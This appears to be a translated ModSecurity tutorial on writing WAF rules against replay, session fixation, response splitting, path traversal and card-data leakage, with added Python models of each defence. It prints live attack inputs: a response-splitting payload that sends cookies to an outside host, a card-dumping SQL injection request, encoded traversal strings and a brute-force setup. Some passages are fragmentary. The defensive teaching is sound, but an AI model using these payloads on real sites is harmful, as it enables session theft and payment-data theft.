[9] Resolved macro %{TX.1} to: 69d032331009e7b0
Variable Manipulation
Most of the data that ModSecurity analyses is handled read-only (static, unchanging data). ModSecurity also lets you create variables whose values can change, to serve specific purposes.
A variable is created with the setvar action:
SecAction nolog,pass,setvar:tx.score=1
The same action removes a variable (note the ! prefix):
SecAction nolog,pass,setvar:!tx.score
A numeric variable is incremented with the setvar action:
SecAction nolog,pass,setvar:tx.score=+2
and decremented with the setvar action:
SecAction nolog,pass,setvar:tx.score=-1
Metadata
Metadata is used in a rule to give detailed information about the alerts the rule generates. It has no effect on the analysis itself, but it makes alerts much easier to manage when you review logs, helping you quickly identify the cause of an exploit attempt against the web server and how to prevent it.
I will start with the following simple rule:
SecRule REQUEST_METHOD "!^(GET|HEAD)$" \
    id:10001,phase:1,t:none,log,block
With these parameters, rule 10001 works fine when it matches. However, the resulting log entry gives no technical detail, no handling guidance, and so on:
[22/Jun/2013:01:21:57 +0700] [www.modsec.com/sid#139efb0][rid#1606370][/][2]
Warning. Match of "rx ^(GET|HEAD)$" against "REQUEST_METHOD" required. [file
"/opt/modsecurity/etc/crs/activated_rules/addingMetadata.conf"] [line "1"] [id "10001"]
To give rule 10001 a better description of the error message, I will adjust the rule as follows:
SecRule REQUEST_METHOD "!^(GET|HEAD)$" \
    "phase:1,t:none,log,block,id:10001,rev:2,\
    severity:WARNING,msg:'Request method is not allowed'"
In the log message we can see the change:
[22/Jun/2013:01:28:19 +0700] [www.modsec.com/sid#17f1fb0][rid#1a59350][/][2]
Warning. Match of "rx ^(GET|HEAD)$" against "REQUEST_METHOD" required. [file
"/opt/modsecurity/etc/crs/activated_rules/addingMetadata.conf"] [line "3"] [id "10001"] [rev
"2"] [msg "Request method is not allowed"] [severity "EMERGENCY"]
#rev: identifies the revision of the rule
#msg: descriptive message for the rule
#severity: the severity level of an attack on the web system (the most severe is EMERGENCY (1) and the least severe is DEBUG (7))
XI.
Case 1: Preventing replay attacks with a random token mechanism.
Reference, OWASP 2010 vulnerability catalogue: Replay Testing (OWASP-WS-007)
In this section I analyse how to limit exploitation of HTML forms. Using the POST method to receive data from the user carries the risk that the request is modified in transit, adding or removing data in service of various kinds of attack.
To defend against this kind of attack, we use the following directives that ModSecurity provides:
SecDisableBackendCompression
SecContentInjection
SecStreamOutBodyInspection
SecHashEngine
SecHashKey
SecHashParam
SecHashMethodRx
This method inserts a validation token into the HTML data when the web server (Apache) returns a response to the user. By applying a hash to the parameters in the HTML body, ModSecurity prevents the information from being tampered with in transit. Below are the supporting rules and directives:
#vi /opt/modsecurity/etc/crs/activated_rules/case1_PreventDataManipulation.conf
SecContentInjection On
SecStreamOutBodyInspection On
SecHashEngine On
SecHashKey rand keyOnly
SecHashParam rv_token
SecHashMethodRx "HashHref" "[a-zA-Z0-9]"
SecRule REQUEST_URI "@validateHash [a-zA-Z0-9]" \
    "phase:2,id:1000,t:none,block,msg:'Request Validation Violation.',ctl:HashEnforcement=On"
The first directive, SecDisableBackendCompression, is used only when ModSecurity is deployed as a reverse proxy, where the data returned to the user is compressed with gzip to reduce bandwidth. The SecEncryption directives that follow tell ModSecurity to generate a random hash value from the hash salt value and the href elements in the HTML body (selected by the pattern defined as a regular expression).
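To show what the HashHref / @validateHash pair does on each side of the connection, here is an added Python model; it is not the document's configuration or ModSecurity's implementation. It uses an HMAC over the link as the "hash value", a constructed placeholder key (SecHashKey rand keyOnly makes ModSecurity generate one at startup instead), the rv_token parameter name from the configuration above, and my own function names.

```python
import hashlib
import hmac
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Added example: outbound link signing and inbound token validation.
# SECRET_KEY is a constructed placeholder, not a real key.
SECRET_KEY = b"constructed-example-key-change-me"
TOKEN_PARAM = "rv_token"   # the parameter name set by SecHashParam above

def _canonical(path: str, pairs) -> str:
    # Everything the token covers: the path plus the query without the token itself.
    pairs = [(k, v) for k, v in pairs if k != TOKEN_PARAM]
    return path + "?" + urlencode(pairs)

def compute_token(path: str, pairs, key: bytes = SECRET_KEY) -> str:
    return hmac.new(key, _canonical(path, pairs).encode("utf-8"), hashlib.sha1).hexdigest()

def sign_url(url: str, key: bytes = SECRET_KEY) -> str:
    """Outbound: append rv_token=<hmac> to one href (what HashHref does per link)."""
    parts = urlsplit(url)
    pairs = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
             if k != TOKEN_PARAM]
    pairs.append((TOKEN_PARAM, compute_token(parts.path, pairs, key)))
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(pairs), parts.fragment))

HREF_RE = re.compile(r'href="([^"]+)"')

def sign_hrefs(html: str, key: bytes = SECRET_KEY) -> str:
    """Outbound: rewrite every href in a response body, the links SecHashMethodRx HashHref selects."""
    return HREF_RE.sub(lambda m: 'href="%s"' % sign_url(m.group(1), key), html)

def validate_request(request_target: str, key: bytes = SECRET_KEY) -> str:
    """Inbound: the outcomes @validateHash distinguishes: "ok", "missing" or "invalid"."""
    parts = urlsplit(request_target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    tokens = [v for k, v in pairs if k == TOKEN_PARAM]
    if not tokens:
        return "missing"          # the audit-log case on the page: "No Hash parameter"
    expected = compute_token(parts.path, pairs, key)
    # Constant-time comparison so the check itself does not leak the token.
    return "ok" if hmac.compare_digest(tokens[0], expected) else "invalid"

if __name__ == "__main__":
    # Constructed response body using the page's example path.
    body = '<a href="/2013/05/owasp-top-10-tools-and-tactics/">OWASP Top 10</a>'
    signed = sign_hrefs(body)
    link = HREF_RE.search(signed).group(1)
    print(signed)
    print(validate_request(link))
    print(validate_request("/2013/05/owasp-top-10-tools-and-tactics/"))
```

The token binds both the path and the remaining query parameters, so stripping the token, appending text to the path, or editing another parameter all fail validation; the page's rule 1000 is what turns the "missing" and "invalid" outcomes into a blocked request.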
URL with token:
http://www.modsec.com/2013/05/owasp-top-10-tools-and-tactics/?rv_token=f3f6de81f7e3014ff6c4c6affce95caaca29e75e
URL with the token removed and an injection appended:
http://www.modsec.com/2013/05/owasp-top-10-tools-and-tactics/%20and%20union%20select%201,2,3,4,5,6
If the attacker deliberately strips the token in order to inject an exploit into the URL, rule 1000 matches and generates an alert in the audit log.
[Wed Jun 05 18:12:16 2013] [error] [client 192.168.149.1] ModSecurity: Access allowed
(phase 2). Request URI matched "[a-zA-Z0-9]" at REQUEST_URI. No Hash parameter [file
"/opt/modsecurity/etc/crs/activated_rules/case1_PreventDataManipulation.conf"] [line "7"]
[id "1000"] [msg "Request Validation Violation."] [hostname "www.modsec.com"] [uri
"/2013/05/owasp-top-10-tools-and-tactics/ and union select 1,2,3,4,5,6"] [unique_id
"Ua8dEH8AAAEAAAyJBzMAAAAE"]
Case 2: Detecting invalid session cookies
Reference, OWASP 2010 vulnerability catalogue: Testing for Session Fixation (OWASP-SM-003)
In this case I analyse an attacker who tries to forge a session cookie in order to exploit the application through session fixation.
Reference components:
"chain,t:none,t:sha1,t:hexEncode,capture,setvar:session.csrf_token=%{TX.1}"
SecRule REMOTE_ADDR "^(\d{1,3}\.\d{1,3}\.\d{1,3}\.)"
"chain,capture,setvar:session.ip_block=%{tx.1}"
SecRule REQUEST_HEADERS:User-Agent ".*"
"t:none,t:sha1,t:hexEncode,setvar:session.ua=%{matched_var}"
By default, rule 981062 looks for common cookie names such as:
WORDPRESSPASS
SESSIONID
JSESSIONID
SESSID
PHPSESSID
SESSION
SESSION_ID
SESSION-ID
ASPSESSION
JSERVSESSION
JWSESSION
CFID
CFTOKEN
CFSID
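The rule fragments above bind a session to the client's address block and a hash of its User-Agent, and the cookie-name list is what the CRS uses to find the session cookie. The following added Python model (not the document's or the CRS's code; the class and function names are my own) shows both pieces together, including the session-fixation case in which the cookie presented was never issued by the server.

```python
import hashlib
from typing import Optional, Tuple

# Added example: session binding as the rule fragments above express it.
# The cookie names are the ones the text says rule 981062 looks for.
SESSION_COOKIE_NAMES = {
    "WORDPRESSPASS", "SESSIONID", "JSESSIONID", "SESSID", "PHPSESSID", "SESSION",
    "SESSION_ID", "SESSION-ID", "ASPSESSION", "JSERVSESSION", "JWSESSION",
    "CFID", "CFTOKEN", "CFSID",
}

def find_session_cookie(cookie_header: str) -> Optional[Tuple[str, str]]:
    """Return the first (name, value) pair whose name is a known session cookie."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name.upper() in SESSION_COOKIE_NAMES:
            return name, value
    return None

def ip_block(remote_addr: str) -> str:
    r"""The leading three octets, as captured by ^(\d{1,3}\.\d{1,3}\.\d{1,3}\.) above."""
    return ".".join(remote_addr.split(".")[:3]) + "."

def ua_hash(user_agent: str) -> str:
    """t:sha1,t:hexEncode of the User-Agent header."""
    return hashlib.sha1(user_agent.encode("utf-8")).hexdigest()

class SessionStore:
    """Stands in for ModSecurity's persistent SESSION collection."""

    def __init__(self):
        self._sessions = {}

    def create(self, session_id: str, remote_addr: str, user_agent: str) -> None:
        # Called when the application itself issues the cookie (Set-Cookie).
        self._sessions[session_id] = {
            "ip_block": ip_block(remote_addr),
            "ua": ua_hash(user_agent),
        }

    def check(self, session_id: str, remote_addr: str, user_agent: str) -> str:
        bound = self._sessions.get(session_id)
        if bound is None:
            return "unknown-session"   # never issued by the server: the fixation case
        if bound["ip_block"] != ip_block(remote_addr):
            return "ip-mismatch"
        if bound["ua"] != ua_hash(user_agent):
            return "ua-mismatch"
        return "ok"

def check_request(store: SessionStore, cookie_header: str, remote_addr: str, user_agent: str) -> str:
    found = find_session_cookie(cookie_header)
    if found is None:
        return "no-session-cookie"
    return store.check(found[1], remote_addr, user_agent)

if __name__ == "__main__":
    store = SessionStore()
    store.create("abc123", "192.168.149.10", "Mozilla/5.0 (X11)")   # constructed values
    print(check_request(store, "PHPSESSID=abc123", "192.168.149.77", "Mozilla/5.0 (X11)"))
    print(check_request(store, "PHPSESSID=forged", "192.168.149.10", "Mozilla/5.0 (X11)"))
```

Comparing only the first three octets, as the regex on the page does, tolerates clients whose address moves within a /24 (a typical NAT pool) while still flagging a cookie replayed from a different network.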
This exploitation technique injects data or a forged HTTP request into another HTTP header. As a result the client receives two different pieces of data in the same HTML page, which sets the stage for cross-user defacement, cache poisoning, XSS and page hijacking.
Below is an example in PHP source code:
<?php
If the attacker deliberately inserts Carriage Return (CR) or Linefeed (LF) characters into the URL parameters on the client side, the response the client receives is restructured to serve the attacker's purpose.
The listing below shows a DOM XSS attack carried out by injecting HTML into the end user's page, although building a packet to inject on the user side is fairly complex.
GET /index.php?language=english
Cotent-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 171
<html><body%20onload='document.location.replace
%20("http://www.swpag.info/cookie_trap/"%252b%20document.cookie
%252b"/URL/"%252bdocument.location);'></body></html> HTTP/1.1
Using the characters %0d and/or %0a, the whole packet above can be turned into a single URL:
GET /index.php?language=english%0aCotent-Length:%200%0a
%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-Length
%20171:%0a%0a<html><body%20onload='document.location.replace
%20("http://www.swpag.info/cookie_trap/"%252b%20document.cookie
%252b"/URL/"%252bdocument.location);'></body></html> HTTP/1.1
To defend against HTTP response splitting, we can use the following rules:
# HTTP Response Splitting
#
# -=[ Rule Logic ]=-
# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters.
# These characters may cause problems if the data is returned in a response header and
# may be interpreted by an intermediary proxy server and treated as two separate
# responses.
#
# -=[ References ]=-
# http://projects.webappsec.org/HTTP-Response-Splitting
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "[\n\r](?:content-(type|length)|set-cookie|location):" \
    "phase:2,rev:'2',ver:'OWASP_CRS/2.2.6',maturity:'9',accuracy:'9',t:none,t:lowercase,capture,ctl:auditLogParts=+E,block,msg:'HTTP Response Splitting Attack',id:'950910',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING-%{matched_var_name}=%{tx.0}"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?:\bhttp\/(?:0\.9|1\.[01])|<(?:html|meta)\b)" \
    "phase:2,rev:'2',ver:'OWASP_CRS/2.2.6',maturity:'9',accuracy:'9',capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,block,msg:'HTTP Response Splitting Attack',id:'950911',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RESPONSE_SPLITTING-%{matched_var_name}=%{tx.0}"
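To see what the two rules above actually match, here is an added Python example (not the document's or the CRS's code) that runs the 950910 and 950911 regular expressions, with the same transformations, over the parameters of a constructed query string shaped like the single-URL payload shown earlier. Python's html.unescape stands in for t:htmlEntityDecode, and the function names are my own.

```python
import html
import re
from urllib.parse import unquote

# Added example: the regexes of rules 950910 / 950911 applied to ARGS values.
RULE_950910 = re.compile(r"[\n\r](?:content-(type|length)|set-cookie|location):")
RULE_950911 = re.compile(r"(?:\bhttp/(?:0\.9|1\.[01])|<(?:html|meta)\b)")

def check_arg(raw_value: str):
    """Return [(rule id, matched text), ...] for one URL-encoded ARGS value."""
    value = unquote(raw_value)              # ARGS are URL-decoded before rules see them
    findings = []
    m = RULE_950910.search(value.lower())   # t:lowercase
    if m:
        findings.append(("950910", m.group(0)))
    # t:htmlEntityDecode,t:lowercase (html.unescape approximates the decoder)
    m = RULE_950911.search(html.unescape(value).lower())
    if m:
        findings.append(("950911", m.group(0)))
    return findings

def scan_query(query: str):
    """Run check_arg over every parameter of a raw query string."""
    results = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        hits = check_arg(value)
        if hits:
            results[unquote(name)] = hits
    return results

# Constructed sample: a split-response payload in the language parameter.
SPLIT_PAYLOAD = ("language=english%0d%0aContent-Length:%200%0d%0a%0d%0a"
                 "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
                 "<html>injected</html>")

if __name__ == "__main__":
    print(scan_query(SPLIT_PAYLOAD))
    print(scan_query("language=english&page=2"))
```

One caveat when reading the page's own payload: it spells the first injected header "Cotent-Length", which rule 950910 would not match, but the later Content-Type header and the HTTP/1.1 status line are still caught; the entity-decoding step in 950911 is what makes an "&lt;html&gt;" variant visible as well.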
Case 4: Preventing path traversal exploitation
Reference, OWASP 2010 vulnerability catalogue: Testing for Path Traversal (OWASP-AZ-001)
Reference components:
Path traversal is an exploitation technique based on manipulating the URL in order to gain unauthorised access to files on the server. Most such flaws arise because the web application's code allows data to be read from a different file by changing the path value in the function
Example
%2f%2e%2e%2f
%c0%af%c0%ae%c0%ae%c0%af
%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af
%252f%252e%252e%252f
%%32%46%%32%45%%32%45%%32%46
%%32F%%32E%%32E%%32F
%2%46%2%45%2%45%2%46
%u002f%u002e%u002e%u002f
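Every entry in the list above is the same four characters, "/../", under a different encoding: plain URL encoding, overlong UTF-8, double encoding, split percent signs and %u encoding. The following added Python example (not the document's or ModSecurity's code; function names are my own) shows the normalisation a detector needs before a single traversal check can cover all of them: repeated percent-decoding followed by a UTF-8 decoder that accepts overlong forms, which is the job ModSecurity's urlDecodeUni-style transformations do before a rule runs.

```python
import re

# Added example: decode the listed encodings back to "/../" before checking.
_HEX = frozenset(b"0123456789abcdefABCDEF")

def _is_hex(chunk: bytes, length: int) -> bool:
    return len(chunk) == length and all(c in _HEX for c in chunk)

def percent_decode_once(data: bytes) -> bytes:
    """One pass of %XX and %uXXXX decoding; malformed escapes are left untouched."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        if data[i] == 0x25:  # '%'
            if data[i + 1:i + 2] in (b"u", b"U") and _is_hex(data[i + 2:i + 6], 4):
                out += chr(int(data[i + 2:i + 6], 16)).encode("utf-8", "surrogatepass")
                i += 6
                continue
            if _is_hex(data[i + 1:i + 3], 2):
                out.append(int(data[i + 1:i + 3], 16))
                i += 3
                continue
        out.append(data[i])
        i += 1
    return bytes(out)

def lenient_utf8(data: bytes) -> str:
    """UTF-8 decoding that also accepts overlong forms such as C0 AF for '/'."""
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b <= 0xDF:
            need, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF:
            need, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7:
            need, cp = 3, b & 0x07
        else:
            out.append(chr(b))   # stray byte: keep as Latin-1
            i += 1
            continue
        tail = data[i + 1:i + 1 + need]
        if len(tail) == need and all(0x80 <= t <= 0xBF for t in tail):
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            valid = cp <= 0x10FFFF and not 0xD800 <= cp <= 0xDFFF
            out.append(chr(cp) if valid else "\ufffd")
            i += 1 + need
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def normalize(raw: str, max_passes: int = 3) -> str:
    """Repeated percent-decoding (covers double encoding) followed by lenient UTF-8."""
    data = raw.encode("utf-8")
    for _ in range(max_passes):
        decoded = percent_decode_once(data)
        if decoded == data:
            break
        data = decoded
    return lenient_utf8(data)

def is_traversal(raw: str) -> bool:
    normalized = normalize(raw)
    return "../" in normalized or "..\\" in normalized

# The encoded forms listed above, constructed here as test input.
ENCODED_VARIANTS = [
    "%2f%2e%2e%2f", "%c0%af%c0%ae%c0%ae%c0%af", "%e0%80%af%e0%80%ae%e0%80%ae%e0%80%af",
    "%252f%252e%252e%252f", "%%32%46%%32%45%%32%45%%32%46", "%%32F%%32E%%32E%%32F",
    "%2%46%2%45%2%45%2%46", "%u002f%u002e%u002e%u002f",
]

if __name__ == "__main__":
    for v in ENCODED_VARIANTS:
        print(f"{v:40} -> {normalize(v)!r} traversal={is_traversal(v)}")
```

The decoder deliberately keeps malformed escapes and stray bytes instead of rejecting the input, because rejecting is exactly what an attacker relies on to make a filter give up while the backend still decodes the value.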
ModSecurity @verifyCC operator
OWASP ModSecurity Core Rule Set
modsecurity_crs_25_cc_known.conf
Leaking user information such as credit card numbers is very serious for e-payment applications and banking solutions. Such leaks are usually the result of targeted SQL injection attacks against e-commerce sites, aimed at stealing users' payment identity information.
Below is a real-world example of information theft from a web application:
GET /cart/loginexecute.asp?LoginEmail='%20or%201=convert(int,(select%20top%201%20convert(varchar,isnull(convert(varchar,OR_OrderDate),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_OrderID),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_FirstName),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_LastName),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_OrderAddress),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_OrderCity),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_OrderZip),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_OrderState),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_OrderCountry),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_CCardName),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_CCardType),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_CCardNumberenc),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_CCardExpDate),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_CCardSecurityCode),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_Email),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,OR_Phone1),'NULL'))%20from%20Orders%20where%20OR_OrderID=47699))--sp_password HTTP/1.1
Accept: image/gif,image/xxbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Cookie: ASPSESSIONIDCCQCSRDQ=EHEPIKBBBFLOFIFOBPCJDBGP
Host: www.banking.com
X-Forwarded-For: 14.0.18.205
Connection: Keep-Alive
Cache-Control: no-cache, bypass-client=14.0.18.205
In the SQL query above, the attacker harvests users' personal data from the tables shown in bold. The rules in the SQL injection group can counter this kind of attack, but note that the SQL injection detection rules are only in monitoring mode (detect-only). After the SQL query executes on the server, the value returned to the user still contains the credit card details (cardholder name, card type, card number and expiry date).
HTTP/1.1 500 Internal Server Error
Content-Length: 573
Content-Type: text/html
Cache-control: private
Connection: close
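Since the injection rules here only detect, the last line of defence is inspecting the response body for card numbers before it reaches the client, which is what the @verifyCC operator referenced above does: a digit-run regular expression narrowed by a Luhn check. The following added Python example (not the document's or ModSecurity's code; the regex and function names are my own) shows that check on a constructed response body, together with masking of the matches.

```python
import re

# Added example: response-body inspection for card numbers in the spirit
# of @verifyCC, followed by masking of what was found.
CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

def luhn_ok(digits: str) -> bool:
    """Luhn checksum, the validation @verifyCC applies to each regex candidate."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def find_card_numbers(body: str):
    """Return (span, digits) for every Luhn-valid candidate in a response body."""
    hits = []
    for m in CANDIDATE_RE.finditer(body):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append((m.span(), digits))
    return hits

def sanitise(body: str) -> str:
    """Mask all but the last four digits of each detected number."""
    out, last = [], 0
    for (start, end), digits in find_card_numbers(body):
        out.append(body[last:start])
        out.append("*" * (len(digits) - 4) + digits[-4:])
        last = end
    out.append(body[last:])
    return "".join(out)

# Constructed response body: one Luhn-valid test number, one 16-digit order id
# that fails Luhn, and a phone number that is too short to be a candidate.
SAMPLE_BODY = (
    "Name: Alice Example\n"
    "Card: 4111-1111-1111-1111\n"
    "Order: 4111111111111112\n"
    "Phone: 0123456789\n"
)

if __name__ == "__main__":
    print(find_card_numbers(SAMPLE_BODY))
    print(sanitise(SAMPLE_BODY))
```

The Luhn step is what keeps order numbers and other long digit runs from being flagged; without it, the regex alone would mask the order id as well. Masking rather than dropping the response keeps the application usable while the leak is investigated.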
For the brute-force demonstration I use the Intruder module of Burp Suite. This module lets the user customise the data in an HTTP request and then send it to the server.
Figure 12: Burp Suite interface with the WordPress CMS login request
In the login request shown above, I mark the pwd parameter as the position where the password values are inserted during the brute force.
XII. APPENDIX

Group, No., Reference, Vulnerability / test name

INFORMATION GATHERING
1   OWASP-IG-001   Spiders, Robots and Crawlers
2   OWASP-IG-002   Search Engine Discovery/Reconnaissance
3   OWASP-IG-003   Identify application entry points
4   OWASP-IG-004   Testing for Web Application Fingerprint
5   OWASP-IG-005   Application Discovery
6   OWASP-IG-006   Analysis of Error Codes

CONFIGURATION MANAGEMENT TESTING
7   OWASP-CM-001   SSL/TLS Testing
8   OWASP-CM-002   DB Listener Testing
9   OWASP-CM-003   Infrastructure Configuration Management Testing
10  OWASP-CM-004   Application Configuration Management Testing
11  OWASP-CM-005   Testing for File Extensions Handling
12  OWASP-CM-006   Old, backup and unreferenced files
13  OWASP-CM-007   Infrastructure and Application Admin Interfaces
14  OWASP-CM-008   Testing for HTTP Methods and XST

AUTHENTICATION TESTING
15  OWASP-AT-001   Credentials transport over an encrypted channel
16  OWASP-AT-002   Testing for user enumeration
17  OWASP-AT-003   Testing for Guessable (Dictionary) User Account
18  OWASP-AT-004   Brute Force Testing
19  OWASP-AT-005   Testing for bypassing authentication schema
20  OWASP-AT-006   Testing for vulnerable remember password and pwd reset
21  OWASP-AT-007   Testing for Logout and Browser Cache Management
22  OWASP-AT-008   Testing for CAPTCHA
23  OWASP-AT-009   Testing Multiple Factors Authentication
24  OWASP-AT-010   Testing for Race Conditions

SESSION MANAGEMENT
25  OWASP-SM-001   Testing for Session Management Schema
26  OWASP-SM-002   Testing for Cookies attributes
27  OWASP-SM-003   Testing for Session Fixation
28  OWASP-SM-004   Testing for Exposed Session Variables
29  OWASP-SM-005   Testing for CSRF

AUTHORIZATION TESTING
30  OWASP-AZ-001   Testing for Path Traversal
31  OWASP-AZ-002   Testing for bypassing authorization schema
32  OWASP-AZ-003   Testing for Privilege Escalation

BUSINESS LOGIC TESTING
33  OWASP-BL-001   Testing for Business Logic

DATA VALIDATION TESTING
34  OWASP-DV-001   Testing for Reflected Cross Site Scripting
35  OWASP-DV-002   Testing for Stored Cross Site Scripting
36  OWASP-DV-003   Testing for DOM based Cross Site Scripting
37  OWASP-DV-004   Testing for Cross Site Flashing
38  OWASP-DV-005   SQL Injection
39  OWASP-DV-006   LDAP Injection
40  OWASP-DV-007   ORM Injection
41  OWASP-DV-008   XML Injection
42  OWASP-DV-009   SSI Injection
43  OWASP-DV-010   XPath Injection
44  OWASP-DV-011   IMAP/SMTP Injection
45  OWASP-DV-012   Code Injection
46  OWASP-DV-013   OS Commanding
47  OWASP-DV-014   Buffer overflow
48  OWASP-DV-015   Incubated vulnerability
49  OWASP-DV-016   Testing for HTTP Splitting/Smuggling

DENIAL OF SERVICE TESTING
50  OWASP-DS-001   Testing for SQL Wildcard Attacks
51  OWASP-DS-002   Locking Customer Accounts
52  OWASP-DS-003   Testing for DoS Buffer Overflows
53  OWASP-DS-004   User Specified Object Allocation
54  OWASP-DS-005   User Input as a Loop Counter
55  OWASP-DS-006   Writing User Provided Data to Disk
56  OWASP-DS-007   Failure to Release Resources
57  OWASP-DS-008   Storing too Much Data in Session

WEB SERVICES TESTING
58  OWASP-WS-001   WS Information Gathering
59  OWASP-WS-002   Testing WSDL
60  OWASP-WS-003   XML Structural Testing
61  OWASP-WS-004   XML content-level Testing
62  OWASP-WS-005   HTTP GET parameters/REST Testing
63  OWASP-WS-006   Naughty SOAP attachments
64  OWASP-WS-007   Replay Testing

AJAX TESTING
65  OWASP-AJ-001   AJAX Vulnerabilities
66  OWASP-AJ-002   AJAX Testing
Tools (columns: Category, Tool, OS, Comments, Link)

Tool                      Category                        OS        Link
Wikto                                                     Windows   http://www.sensepost.com/research/wikto/
Nikto                                                     Linux
Paros                     Web App Proxy
TamperIE                  Data Tampering
Nessus                    Vulnerability Scanner           Windows   http://www.nessus.org
Nmap
Wget
SamSpade
Spike Proxy
Xenu
Curl                                                                http://curl.haxx.se/
OpenSSL
Burp Proxy
SSLDigger                 Encryption tools
HTTrack
HTTPrint                  Webserver Fingerprinting tool
Webscarab                 Web Vulnerability Analysis
Foundstone Cookie Digger

Categories listed in the table: Web Server Assessment Tool, Web Mirroring, Web Spidering, Web Crawler, Secure FTP, Encryption tools, Web Vulnerability Scanners, Webserver Fingerprinting tool, Web App Proxy, Data Tampering, Vulnerability Scanner, Web Vulnerability Analysis.

Comments:
Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions. Burp Proxy allows you to find and exploit application vulnerabilities by monitoring and manipulating critical parameters and other data transmitted by the application. By modifying browser requests in various malicious ways, Burp Proxy can be used to perform attacks such as SQL injection, cookie subversion, privilege escalation, session hijacking, directory traversal and buffer overflows.
SSLDigger v1.02 is a tool to assess the strength of SSL servers by testing the ciphers supported. Some of these ciphers are known to be insecure.
httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask. httprint can also be used to detect web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. httprint uses text signature strings and it is
REFERENCE LIST OF WEB APPLICATION SECURITY VULNERABILITY TESTS
(columns: Category, Ref. Number, Test Name, Vulnerability, Comment, Tests, Tools)

Information Gathering
IG-001  Spiders, Robots and Crawlers
        Vulnerability: N.A.
        Tests: Analyze Robots with Google Webmaster
        Tools: HTTrack, Wikto/Nikto
IG-002  Search Engine Discovery/Reconnaissance
        Vulnerability: N.A.
        Comment: Information obtained with help of Search Engines
        Tools: Goolag scanner, Google Hacking db (Johny), Google, Kartoo
IG-003  Identify application entry points
        Vulnerability: N.A.
        Tools: Paros, Webscarab, Tamper IE, Tamper Data
IG-004  Testing for Web Application Fingerprint
        Vulnerability: N.A.
        Comment: WebServer Details Enumeration
        Tools: HTTP Print, NetCraft, nMap, telnet, nessus
IG-005  Application Discovery
        Vulnerability: N.A.
        Comment: find Applications hosted in the webserver, non standard ports
        Tools: host, Netcraft Search DNS service, DNS Stuff Reverse IP Lookup, nslookup, wikto
IG-006  Analysis of Error Codes
        Vulnerability: Information Disclosure
        Comment: Grab information disclosed in error codes
        Tools: Software Proxies, Wikto

Configuration Management Testing
CM-001  SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity)
        Vulnerability: SSL Weakness
        Tools: nMap, Nessus, OpenSSL, SSLDigger
CM-002  DB Listener Testing
        Vulnerability: DB Listener weak
        Comment: For Intranet sites
        Tools: Integrigy lsnrcheck, LSNRCTL, TNS Listener
CM-003  Infrastructure Configuration Management Testing
        Vulnerability: Infrastructure Configuration management weakness
        Comment: Config management for webserver software, back-end database servers, auth servers.
CM-004  Application Configuration Management Testing
        Vulnerability: Application Configuration management weakness
        Comment: Make sure that all the configuration guidelines are followed
